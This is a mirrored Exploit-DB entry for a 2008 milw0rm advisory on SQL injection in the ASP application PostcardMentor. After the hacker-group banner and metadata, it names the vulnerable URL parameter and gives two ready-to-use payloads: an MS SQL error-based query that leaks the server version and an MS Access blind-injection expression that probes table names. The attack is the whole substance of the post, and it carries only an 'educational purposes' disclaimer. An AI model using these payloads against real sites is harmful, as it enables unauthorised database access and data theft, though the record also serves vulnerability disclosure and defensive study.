- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5556
- Проверка EDB
-
- Пройдено
- Автор
- INJECTOR5
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2008-2132
- Дата публикации
- 2008-05-07
Код:
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: Multiple SQL Injections [Remote + Blind]
Author :: InjEctOrs
Found By : Bl@ckbe@rD [blackbeard-sql (at) hotmail (dot) fr ]
Application :: PostcardMentor latest version
Download :: http://www.aspcode.net/Download-latest-version-4.aspx
Dork 1 :: :p
Greets :: Allah , King Of hacker , InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal
acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
Vulnerability:
http://localhost/PostcardMentor/step1.asp?cat_fldAuto={SQL}
{SQL} --> MS SQL Server for example : convert(int,(select+@@version))
{SQL} --> MS ACCESS for example : 1 IIF((select%20mid(last(name),1,1)%20from%20(select%20top%2010%20name%20from%20cat))='a',0,'done')
-------------------------------------------[End of context]----------------------------------------
# milw0rm.com [2008-05-07]
- Источник
- www.exploit-db.com